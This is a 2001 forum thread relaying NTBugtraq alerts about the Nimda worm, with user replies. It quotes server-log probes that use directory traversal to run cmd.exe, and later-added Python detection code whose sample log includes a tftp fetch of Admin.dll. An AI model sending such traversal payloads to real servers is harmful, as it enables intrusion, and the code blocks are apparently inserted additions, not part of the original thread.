Free Republic

Some sort of IIS worm seems to be propagating
NTBugTraq | Russ

Posted on 09/18/2001 8:58:18 AM PDT by toenail


-----BEGIN PGP SIGNED MESSAGE-----

There have been numerous reports of IIS attacks being generated by
machines over a broad range of IP addresses. These "infected"
machines are using a wide variety of attacks which attempt to exploit
already known and patched vulnerabilities against IIS.

It appears that the attacks can come both from email and from the
network.

A new worm, being called w32.nimda.amm, is being sent around. The
attachment is called README.EXE and comes as a MIME-type of
"audio/x-wav" together with some html parts. There appears to be no
text in this message when it is displayed by Outlook when in
Auto-Preview mode (always a good indication there's something not
quite right with an email.)

The network attacks against IIS boxes are a wide variety of attacks.
Amongst them appear to be several attacks that assume the machine is
compromised by Code Red II (looking for ROOT.EXE in the /scripts and
/msadc directory, as well as an attempt to use the /c and /d virtual
roots to get to CMD.EXE). Further, it attempts to exploit numerous
other known IIS vulnerabilities.

One thing to note is the attempt to execute TFTP.EXE to download a
file called ADMIN.DLL from (presumably) some previously compromised
box.

Anyone who discovers a compromised machine (a machine with ADMIN.DLL
in the /scripts directory), please forward me a copy of that .dll
ASAP.

Also, look for TFTP traffic (UDP69). As a safeguard, consider doing
the following;

edit %systemroot%\system32\drivers\etc\services.

change the line;

tftp 69/udp

to;

tftp 0/udp

thereby disabling the TFTP client. W2K has TFTP.EXE protected by
Windows File Protection so can't be removed.

More information as it arises.

Cheers,
Russ - Surgeon General of TruSecure Corporation/NTBugtraq Editor

-----BEGIN PGP SIGNATURE-----
Version: PGP Personal Privacy 6.5.2

iQCVAwUBO6dmcRBh2Kw/l7p5AQHJCgQA1JHwqF5RjJX+QVMMDUChVqn6yReQXqEH
Tm8Ujms5+6ia0tcT1qmZWJV48eHYNzV3+AyyO6Gn8ds/NVYJUupDHB1Yy1DY/po6
iycY2qnARDJP6KNmHI0bAdBUBtsnVo5P9itElIoqKbAorQjamKI2eqd4TdE0yfIO
hSW7yN2lhJc=
=YAwc
-----END PGP SIGNATURE-----

============================================================================
Delivery co-sponsored by Trend Micro, Inc.
============================================================================
TREND MICRO SCANMAIL FOR EXCHANGE 2000 -- SECOND to NONE

If you are worried about email viruses, you need Trend Micro ScanMail for
Exchange. ScanMail is the first antivirus solution that seamlessly
integrates with the Microsoft Exchange 2000 virus-scanning API 2.0. ScanMail
ensures 100% inbound and outbound email virus scanning and provides remote
software management. Download a FREE 30-day trial copy of ScanMail and find
out why it is the best:
http://www.antivirus.com/banners/tracking.asp?si=8&BI=240&UL=/smex2000
============================================================================


TOPICS: Breaking News; News/Current Events
I hate administering IIS ......
1 posted on 09/18/2001 8:58:18 AM PDT by toenail
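The delivery mechanism Russ describes (README.EXE declared as audio/x-wav alongside HTML parts) is a content-type mismatch that a mail gateway can catch before any signature exists. The following is an added example, not code from NTBugtraq or from anyone in this thread: it parses a message with Python's email package and flags parts whose declared media type disagrees with the attachment's extension or with a PE "MZ" header. The two messages it builds are constructed for the test (the "MZ" stub is not an executable and not a sample of the worm); the extension list is an assumption.

```python
import email
from email import policy
from email.message import EmailMessage

# Extensions Windows runs on open (assumed list).  The advisory's sample carried README.EXE
# under Content-Type audio/x-wav, so the check is "media content type, executable payload".
EXECUTABLE_EXTS = (".exe", ".com", ".scr", ".pif", ".bat", ".cmd", ".dll", ".vbs")
MEDIA_TYPES = {"audio", "image", "video"}


def suspicious_parts(raw_message: bytes):
    """Return [(filename, declared content type, reason)] for every MIME part whose
    declared media type does not match what the part actually carries."""
    msg = email.message_from_bytes(raw_message, policy=policy.default)
    hits = []
    for part in msg.walk():
        if part.is_multipart():
            continue  # containers carry no payload of their own
        ctype = part.get_content_type()
        maintype = ctype.split("/", 1)[0]
        fname = (part.get_filename() or "").lower()
        payload = part.get_payload(decode=True) or b""
        reasons = []
        if maintype in MEDIA_TYPES and fname.endswith(EXECUTABLE_EXTS):
            reasons.append("executable extension under a media content type")
        if payload[:2] == b"MZ" and maintype != "application":
            reasons.append("PE (MZ) header under a non-application content type")
        if reasons:
            hits.append((fname, ctype, "; ".join(reasons)))
    return hits


def build_sample(attachment: bytes, subtype: str, filename: str) -> bytes:
    """Constructed test message: an HTML body plus one attachment declared as audio/<subtype>."""
    msg = EmailMessage()
    msg["From"] = "sender@example.invalid"
    msg["To"] = "victim@example.invalid"
    msg["Subject"] = "(none)"
    msg.set_content("<html><body></body></html>", subtype="html")
    msg.add_attachment(attachment, maintype="audio", subtype=subtype, filename=filename)
    return msg.as_bytes()


# Constructed payloads: a stub with a DOS 'MZ' header (not a real executable, not the worm)
# and the start of a genuine RIFF/WAVE header.
FAKE_PE = b"MZ" + b"\x00" * 62
REAL_WAV = b"RIFF\x24\x00\x00\x00WAVEfmt "


def scan_samples():
    """Run both constructed messages through the check; only the disguised one is flagged."""
    return {
        "readme_exe": suspicious_parts(build_sample(FAKE_PE, "x-wav", "README.EXE")),
        "real_wav": suspicious_parts(build_sample(REAL_WAV, "x-wav", "song.wav")),
    }


if __name__ == "__main__":
    for name, hits in scan_samples().items():
        print(name, "->", hits or "clean")
```

The header check matters more than the extension check: a renamed attachment still starts with "MZ", and a gateway that only trusts the declared Content-Type is exactly what this message was built to get past.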

To: toenail
Dump windoze! Head for Unix. That is all.
2 posted on 09/18/2001 9:01:51 AM PDT by TERMINATTOR

To: toenail
Thanks toenail! Bump!
3 posted on 09/18/2001 9:07:04 AM PDT by firewalk

To: toenail
YouDaMan....

I've been working on these code red worms for the last 20 days and appreciate the author's insight. Do you have a url?

4 posted on 09/18/2001 9:15:02 AM PDT by Justa

To: toenail
Previously patched boxes shouldn't have a problem. MS has an update on their site (windowsupdate.microsoft.com) that patches all known holes on IIS in case you're not sure of your box's security. We just re-patched our web servers to make sure nothing was missed...
5 posted on 09/18/2001 9:16:34 AM PDT by BostonGuy

To: toenail
Herewith a related story from the cybertelecom.org mailing list:

ADVISORY 01-021

http://www.nipc.gov/warnings/advisories/2001/01-021.htm "Potential Distributed Denial of Service (DDoS) Attacks " 09/17/2001

The National Infrastructure Protection Center (NIPC) expects an increase in Distributed Denial of Service (DDoS) attacks. NIPC Advisory 01-020, "Increased Cyber Awareness" dated September 14, 2001 warned of threatened vigilante hacking activity against organizations associated with the perceived perpetrators of the September 11, 2001 terror attacks.

On September 12, 2001, a group of hackers named the Dispatchers claimed they had already begun network operations against information infrastructure components such as routers. The Dispatchers stated they were targeting the communications and finance infrastructures. They also predicted that they would be prepared for increased operations on or about Tuesday, September 18, 2001.

There is the opportunity for significant collateral damage to any computer network and telecommunications infrastructure that does not have current countermeasures in place. The Dispatchers claim to have over 1,000 machines under their control for the attacks. It is likely that the attackers will mask their operations by using the IP addresses and pirated systems of uninvolved third parties.

System administrators are encouraged to check their systems for zombie agent software and ensure they institute best practices such as ingress and egress filtering. The NIPC has made available the "Find DDoS" tool to determine if your computer has been infected by the most common DDoS agents. The tool may be downloaded from the following website:

http://www.nipc.gov/warnings/advisories/2000/00-055.htm.

Additionally, a list of best practices is available from the CERT/CC website, located at: http://www.cert.org/security-improvement.

Recipients of this advisory are encouraged to report computer intrusions to their local FBI office (http://www.fbi.gov/contact/fo/fo.htm) or the NIPC, and to the other appropriate authorities. Incidents may be reported online at http://www.nipc.gov/incident/cirr.htm. The NIPC Watch and Warning Unit can be reached at (202) 323-3204/3205/3206 or nipc.watch@fbi.gov.

** www.cybertelecom.org **

6 posted on 09/18/2001 9:28:58 AM PDT by lawyamike

To: Justa
Looks like you don't have to worry about Code Red much anymore. Since this started at 9 this morning my system hasn't gotten any CR hits. The annoying part is this one sucks more than CR, 16 hits from each infected machine.
7 posted on 09/18/2001 9:29:07 AM PDT by danielobvt

To: toenail
I'm seeing a lot of that junk right now:

65.100.214.71 - - [18/Sep/2001:09:30:50 -0700] "GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 298 "-" "-"
65.100.214.71 - - [18/Sep/2001:09:30:54 -0700] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 312 "-" "-"
65.100.214.71 - - [18/Sep/2001:09:30:54 -0700] "GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 329 "-" "-"
65.100.214.71 - - [18/Sep/2001:09:30:54 -0700] "GET /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 329 "-" "-"
65.100.214.71 - - [18/Sep/2001:09:30:54 -0700] "GET /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 345 "-" "-"
65.100.214.71 - - [18/Sep/2001:09:30:55 -0700] "GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 311 "-" "-"
65.100.214.71 - - [18/Sep/2001:09:30:55 -0700] "GET /scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 311 "-" "-"
65.100.214.71 - - [18/Sep/2001:09:30:55 -0700] "GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 311 "-" "-"
65.100.214.71 - - [18/Sep/2001:09:30:55 -0700] "GET /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 311 "-" "-"
65.100.214.71 - - [18/Sep/2001:09:30:56 -0700] "GET /scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 295 "-" "-"
65.100.214.71 - - [18/Sep/2001:09:30:56 -0700] "GET /scripts/..%%35c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 295 "-" "-"
65.100.214.71 - - [18/Sep/2001:09:30:56 -0700] "GET /scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 312 "-" "-"
65.100.214.71 - - [18/Sep/2001:09:30:57 -0700] "GET /scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 312 "-" "-"

Fortunately, our servers are Debian GNU/Linux with Apache.

8 posted on 09/18/2001 9:34:04 AM PDT by B Knotts
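The requests in the log above reach the same handful of IIS holes Russ lists through three encodings: plain traversal, the double-decoded %255c form (MS01-026) and the overlong UTF-8 forms %c0%af, %c1%9c and %c1%1c (MS00-078). As an added example, not code from this thread or from NTBugtraq, the Python below normalises each request path the way the unpatched decoder did and tallies, per source address, the probe categories the advisory names (Code Red II backdoor, traversal to cmd.exe, TFTP/ADMIN.DLL staging), so an Apache or IIS log can be turned into a block list of infected senders. The sample lines are constructed on the pattern of the post (RFC 5737 addresses); the category names, and the generalisation of the overlong rule to any 0xC0/0xC1 lead byte, are this example's own assumptions.

```python
import re
from collections import Counter
from urllib.parse import unquote_to_bytes

# NCSA combined log line: host ident user [time] "method path proto" status bytes "ref" "ua"
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<path>\S+)[^"]*" (?P<status>\d{3}) '
)


def overlong_decode(data: bytes) -> str:
    """Decode the way the unpatched IIS decoder did (MS00-078): a 0xC0/0xC1 lead byte plus
    ANY following byte is accepted as a two-byte sequence, so C0 AF -> '/', C1 9C -> '\\',
    C1 1C -> '\\' and C0 2F -> '/'.  A conforming UTF-8 decoder rejects all of these."""
    out, i = [], 0
    while i < len(data):
        b = data[i]
        if b in (0xC0, 0xC1) and i + 1 < len(data):
            out.append(chr(((b & 0x1F) << 6) | (data[i + 1] & 0x3F)))
            i += 2
        else:
            out.append(chr(b))
            i += 1
    return "".join(out)


def normalize_path(path: str) -> str:
    """Canonicalise a request path as the vulnerable server would have: percent-decode, decode
    a second time if '%' survives (the MS01-026 double-decode bug turns %255c into '\\'),
    then apply the overlong rule.  Backslashes become '/' and case is folded."""
    data = unquote_to_bytes(path)
    if b"%" in data:
        data = unquote_to_bytes(data)
    return overlong_decode(data).replace("\\", "/").lower()


def encoding_tricks(raw_path: str):
    """Name the evasion used in the raw (still encoded) path."""
    low = raw_path.lower()
    tricks = []
    if "%25" in low or "%%" in low:
        tricks.append("double-encoded")
    if re.search(r"%c[01]%", low):
        tricks.append("overlong-utf8")
    return tricks


def categories(norm_path: str):
    cats = []
    # Code Red II left root.exe in /scripts and /msadc and mapped C:\ and D:\ as /c and /d.
    if "/root.exe" in norm_path or norm_path.startswith(("/c/winnt/", "/d/winnt/")):
        cats.append("codered2_backdoor")
    if "/../" in norm_path and "cmd.exe" in norm_path:
        cats.append("traversal_to_cmd")
    # The advisory's staging step: tftp.exe fetching admin.dll from an already infected host.
    if "tftp" in norm_path or "admin.dll" in norm_path:
        cats.append("nimda_staging")
    return cats


def classify_line(line: str):
    m = LOG_RE.match(line)
    if not m:
        return None
    norm = normalize_path(m.group("path"))
    cats = categories(norm)
    if not cats:
        return None
    return {"ip": m.group("ip"), "status": int(m.group("status")), "normalized": norm,
            "tricks": encoding_tricks(m.group("path")), "categories": cats}


def summarize(lines):
    """Per-source tally of probe categories regardless of HTTP status: a 404 only means this
    server was not vulnerable, the sender is still an infected machine worth blocking."""
    per_ip = {}
    for line in lines:
        hit = classify_line(line)
        if hit:
            per_ip.setdefault(hit["ip"], Counter()).update(hit["categories"])
    return per_ip


# Constructed lines modelled on the probes quoted in this thread (RFC 5737 test addresses).
SAMPLE_LOG = """\
192.0.2.10 - - [18/Sep/2001:09:30:50 -0700] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 298 "-" "-"
192.0.2.10 - - [18/Sep/2001:09:30:50 -0700] "GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 298 "-" "-"
192.0.2.10 - - [18/Sep/2001:09:30:54 -0700] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 312 "-" "-"
192.0.2.10 - - [18/Sep/2001:09:30:55 -0700] "GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 311 "-" "-"
192.0.2.10 - - [18/Sep/2001:09:30:56 -0700] "GET /scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 295 "-" "-"
192.0.2.10 - - [18/Sep/2001:09:30:57 -0700] "GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+tftp%20-i%20192.0.2.10%20GET%20Admin.dll HTTP/1.0" 404 311 "-" "-"
198.51.100.7 - - [18/Sep/2001:09:31:02 -0700] "GET /index.html HTTP/1.1" 200 5120 "-" "Mozilla/4.0"
"""

if __name__ == "__main__":
    for ip, tally in summarize(SAMPLE_LOG.splitlines()).items():
        print(ip, dict(tally))
```

The decode-then-match order is the point: matching the raw strings would need one pattern per encoding, and the worm's "%%35%63" form (a 400 on Apache above, so it never even reached the filesystem) is still a traversal once decoded twice.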

To: toenail
I started seeing this in my logs around 6:34 AM this morning. It has flooded our ISP's routers and I am on dialup right now.

I wonder if this is the precursor to something else?
9 posted on 09/18/2001 9:36:59 AM PDT by oc-flyfish

To: B Knotts
Yup, I am seeing the same thing in my logs as well.
10 posted on 09/18/2001 9:39:01 AM PDT by oc-flyfish

To: lawyamike
Ding dongs! The Dispatchers were supposed to hit the bad guys. You would have thought they would have only targeted subnets in the Middle East.
11 posted on 09/18/2001 9:46:55 AM PDT by oc-flyfish

To: toenail

-----BEGIN PGP SIGNED MESSAGE-----

Numerous people have reported that on IIS servers infected with
w32.nimda.amm, when visitors browse to their website the visitor is
offered up README.EML, which in turn downloads README.EXE to the
visitor.

Please, check your IIS boxes now to see if you are infected. I've had
reports of IIS servers with more than 10,000 .eml files present
(mostly as a result of nimda).

While we don't have any conclusive disinfecting procedures yet, any
IIS box that has been infected definitely shouldn't be available to
clients until we do.

Cheers,
Russ - Surgeon General of TruSecure Corporation/NTBugtraq Editor

-----BEGIN PGP SIGNATURE-----
Version: PGP Personal Privacy 6.5.2

iQCVAwUBO6d1/RBh2Kw/l7p5AQEk4AP+N4foFCyTyBb9nzILJPULLWcEvItbbvm+
Td9+lGUTjvmxbH8dTZ+ITddraZGyD+FDo9fdCGT+XZilSInvhihN1OVE70NgUFPI
5lCm/mTiBExXvos8o61fCzzL9rJ2nCW47Wx1WX//2LHhg740actR+XV0TPQqG1Rw
+6PAR+SPMJc=
=k/xS
-----END PGP SIGNATURE-----


12 posted on 09/18/2001 9:47:56 AM PDT by toenail
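Both of Russ's notes ask the same things of an IIS administrator: look for ADMIN.DLL and ROOT.EXE under /scripts (and /msadc), count the .eml files an infected server is serving to visitors, and apply the services-file change that disables the TFTP client. The script below is an added example, not NTBugtraq's code, that does that walk in Python and rewrites the `tftp 69/udp` line as the first note prescribes, reporting whether anything changed so it can be re-run safely. The directory layout and services excerpt it builds are constructed for the test; names are compared case-insensitively on the assumption of NTFS. The services edit is the advisory's safeguard and nothing more: it does not remove TFTP.EXE, which Windows File Protection guards on Windows 2000.

```python
import os
import re
import tempfile
from collections import Counter

# Names both notes tell administrators to look for; compared lowercase (NTFS is case-insensitive).
DROPPED_NAMES = {"admin.dll", "root.exe"}
MAIL_FILE_EXTS = {".eml"}
# 'tftp   69/udp   # comment' in %systemroot%\system32\drivers\etc\services, any whitespace.
TFTP_LINE_RE = re.compile(r"^(?P<name>\s*tftp\s+)69(?P<rest>/udp\b.*)$", re.IGNORECASE | re.MULTILINE)


def scan_tree(root: str) -> dict:
    """Walk `root` (an IIS webroot with /scripts and /msadc under it) and tally the artifacts
    the thread describes: dropped executables and the .eml files an infected server offers."""
    report = {"dropped": [], "dropped_names": [], "mail_files": Counter(), "total_files": 0}
    for dirpath, _subdirs, files in os.walk(root):
        for name in files:
            report["total_files"] += 1
            low = name.lower()
            if low in DROPPED_NAMES:
                report["dropped"].append(os.path.join(dirpath, name))
                report["dropped_names"].append(low)
            if os.path.splitext(low)[1] in MAIL_FILE_EXTS:
                report["mail_files"][os.path.splitext(low)[1]] += 1
    report["dropped_names"].sort()
    return report


def disable_tftp_client(services_text: str):
    """Apply the advisory's safeguard to the contents of the services file: rewrite
    'tftp 69/udp' as 'tftp 0/udp', keeping spacing and trailing comment.
    Returns (new_text, changed); running it on already-edited text changes nothing."""
    new_text, count = TFTP_LINE_RE.subn(r"\g<name>0\g<rest>", services_text)
    return new_text, count > 0


def build_sample_tree() -> str:
    """Constructed directory layout resembling an infected server, for the test only."""
    root = tempfile.mkdtemp(prefix="iis-triage-")
    layout = {
        "wwwroot/default.htm": b"<html></html>",
        "wwwroot/readme.eml": b"MIME-Version: 1.0\r\n",
        "wwwroot/img/logo.gif": b"GIF89a",
        "wwwroot/img/readme.eml": b"MIME-Version: 1.0\r\n",
        "wwwroot/docs/README.EML": b"MIME-Version: 1.0\r\n",
        "scripts/Admin.dll": b"MZ",
        "msadc/root.exe": b"MZ",
    }
    for rel, data in layout.items():
        full = os.path.join(root, *rel.split("/"))
        os.makedirs(os.path.dirname(full), exist_ok=True)
        with open(full, "wb") as fh:
            fh.write(data)
    return root


# Constructed excerpt of a services file (not a copy of the real one).
SAMPLE_SERVICES = "echo  7/udp\ntftp  69/udp  # Trivial File Transfer\nbootps  67/udp\n"

if __name__ == "__main__":
    r = scan_tree(build_sample_tree())
    print("dropped:", r["dropped"])
    print("mail files:", dict(r["mail_files"]), "of", r["total_files"])
    print(disable_tftp_client(SAMPLE_SERVICES)[0])
```

Run the scan against the real webroot and script directories before touching anything else: as the second note says, a server that turns up ADMIN.DLL or a pile of .eml files should come off the network until a disinfection procedure exists, and the file list is what you would forward to Russ.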

To: toenail
Hey, toenail,

I'm sure everything you said is good, but being a member of the paper-and-pencil generation (born 1931), I didn't understand a bit of it.

Apparently a lot of people did understand it, so keep up the good work.

God Bless the USA.

B14

13 posted on 09/18/2001 9:48:49 AM PDT by BLASTER 14

To: toenail
I hate administering IIS ......

You and me both. This is all I f'ing need today....

Thanks for the post.

14 posted on 09/18/2001 9:52:02 AM PDT by usconservative

To: toenail
Something hit my home PC today - while at FR website - but it might have been from email. Messages were coming in. I use Zone alarm and Norton Antivirus. on dialup modem. I rebooted my Dell and it did fine - but this worm may still be there - right? What measures should a non-techie take?
15 posted on 09/18/2001 9:57:56 AM PDT by Freedom'sWorthIt

To: Freedom'sWorthIt
What measures should a non-techie take?

Hang tight for right now.  Symantec (makes NAV) doesn't have an updated virus pattern file yet for this worm.

You can check for updates at the following location:

http://www.symantec.com/avcenter/venc/data/w32.nimda.a@mm.html

16 posted on 09/18/2001 10:02:39 AM PDT by oc-flyfish

To: danielobvt
Well, I've gotten 25 hits in the last half-hour. 2 is typical.

I located the root.exe and admin.dll payloads on my machine. Not fun. I'm still stuck with an NT comm.drv (in '98) and loads of orphaned NT processes. Together they hog the CPU (P3/866@1G). It runs 40% at desktop idle. At least that's better than the 95% I started with when I had explorer.exe ver. 3112. I wonder, who would make a virus which would update the shell and clog the CPU? Imo, to do that they'd have to know the source code in order to have kernel32 spin up a new shell.

Virus scanners (Trend, Symantec) didn't detect this and ZA didn't stop it.

17 posted on 09/18/2001 10:04:06 AM PDT by Justa

To: Justa
Virus scanners (Trend, Symantec) didn't detect this and ZA didn't stop it.

I disconnected temporarily until Symantec comes out with updated pattern files.

As for the coding... not sure. I wonder if this is what the Dispatchers were working on (probably) or just happens to have occurred at the same time.

18 posted on 09/18/2001 10:15:08 AM PDT by oc-flyfish

To: toenail
I have received two emails with this attachment so far in the past two days. They get deleted without even being opened.
19 posted on 09/18/2001 10:17:13 AM PDT by habs4ever

To: toenail
There is a known bug in MSIE 5 that automatically executes files with a ".eml" extension. The prescribed workaround is to go into your security settings (Tools->Internet Options->Security->Custom Levels) and disable Active Scripting. The program embedded in the ".eml" file should then ask permission before running.
20 posted on 09/18/2001 10:17:43 AM PDT by kevkrom
